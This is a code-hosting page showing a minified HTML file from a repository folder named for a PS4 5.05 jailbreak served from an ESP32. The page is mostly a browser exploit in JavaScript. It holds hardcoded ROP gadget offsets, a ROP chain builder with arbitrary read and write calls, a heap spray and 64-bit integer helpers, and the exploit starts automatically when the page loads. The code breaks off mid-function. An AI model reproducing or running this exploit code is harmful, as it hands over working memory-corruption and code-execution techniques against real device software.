miguel/Lab_interaccio
1
0
Fork 0
Code Issues Pull requests Actions Packages Projects Releases Wiki Activity
Lab_interaccio/2018/esp32-ps4-jailbreak/index.htm

2 lines
39 KiB
HTML
Raw Permalink Normal View History

second commit
2025-02-25 21:29:42 +01:00
<!DOCTYPE html><html><head><title>PS4Jailbreak 5.05 (HEN) for ESP32</title><meta name=viewport content="width=device-width, initial-scale=1"><style>.loader{position:absolute;left:50%;top:50%;margin:-75px 0 0 -75px;border:10px solid #f3f3f3;border-radius:50%;border-top:10px solid #044595;border-left:10px solid #044595;width:120px;height:120px;-webkit-animation:spin 1s linear infinite}.info{overflow:hidden;position:fixed;position:absolute;top:50%;left:50%;font-size:45px;font-family:sans-serif;transform:translate(-50%,-50%)}.credits{overflow:hidden;position:fixed;position:absolute;top:90%;left:50%;font-size:16px;font-family:sans-serif;text-align:center;transform:translate(-50%,-90%)}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(360deg)}}</style></head><body style=margin:0><div id=loader class=loader></div><div id=done class=info style=display:none>Done.</div><div id=fail class=info style=display:none>Fail!</div><div id=footer class=credits><ul style=list-style:none;padding-left:0><li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li><a href=#>SiSTRo</a></li><li>anonymous contributors</li></ul></div><script>var p;var s={};var g={};var gc={"pop_r8":96709,"pop_r9":12268047,"pop_rax":17397,"pop_rcx":339545,"pop_rdx":1826852,"pop_rsi":586634,"pop_rdi":232890,"pop_rsp":124551,"jmp_rax":130,"jmp_rdi":2711166,"mov_rdx_rax":3488561,"mov_rdi_rax":22692143,"mov_rax_rdx":1896224,"mov_rbp_rsp":985418,"mov__rdi__rax":3857131,"mov__rdi__rsi":146114,"mov__rax__rsi":2451047,"mov_rax__rax__":444474,"mov_rax__rdi__":290553,"add_rax_rsi":1384646,"and_rax_rsi":22481823,"add_rdi_rax":5593055,"jop":800720,"ret":60,"stack_chk_fail":200,"setjmp":5368};window.onload=function(){setTimeout(exploit,3000);};window.onerror=function(e){document.getElementById("loader").style.display="none";document.getElementById("fail").style.display="block";if(e.startsWith("Error:")==true){alert(e);}else{location.reload();};};function done(){document.getElementById("loader").style.display="none";document.getElementById("done").style.display="block";};var rop=function(){this.stack=new Uint32Array(65536);this.stackBase=p.read8(p.leakval(this.stack).add32(16));this.count=0;this.clear=function(){this.count=0;this.runtime=undefined;for(var i=0;i<4080/2;i++){p.write8(this.stackBase.add32(i*8),0);};};this.pushSymbolic=function(){this.count++;return this.count-1;};this.finalizeSymbolic=function(idx,val){p.write8(this.stackBase.add32(idx*8),val);};this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(),val);};this.push_write8=function(where,what){this.push(g.pop_rdi);this.push(where);this.push(g.pop_rsi);this.push(what);this.push(g.mov__rdi__rsi);};this.fcall=function(rip,rdi,rsi,rdx,rcx,r8,r9){if(rdi!=undefined){this.push(g.pop_rdi);this.push(rdi);};if(rsi!=undefined){this.push(g.pop_rsi);this.push(rsi);};if(rdx!=undefined){this.push(g.pop_rdx);this.push(rdx);};if(rcx!=undefined){this.push(g.pop_rcx);this.push(rcx);};if(r8!=undefined){this.push(g.pop_r8);this.push(r8);};if(r9!=undefined){this.push(g.pop_r9);this.push(r9);};this.push(rip);return this;};this.run=function(){var retv=p.loadchain(this,this.notimes);this.clear();return retv;};return this;};function makeid(){var text="";var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";for(var i=0;i<8;i++){text+=possible.charAt(Math.floor(Math.random()*possible.length));};return text;};var instancespr=[];for(var i=0;i<4096;i++){instancespr[i]=new Uint32Array(1);instancespr[i][makeid()]=50057;};var _dview;function u2d(low,hi){if(!_dview)_dview=new DataView(new ArrayBuffer(16));_dview.setUint32(0,hi);_dview.setUint32(4,low);return _dview.getFloat64(0);};function zeroFill(number,width){width-=number.toString().length;if(width>0){return new Array(width+(/\./.test(number)?2:1)).join("0")+number;};return number+"";};function int64(low,hi){this.low=(low>>>0);this.hi=(hi>>>0);this.add32=function(val){var new_lo=(((this.low>>>0)+val)&4294967295)>>>0;var new_hi=(this.hi>>>0);if(new_lo<this.lo
Reference in a new issue Copy permalink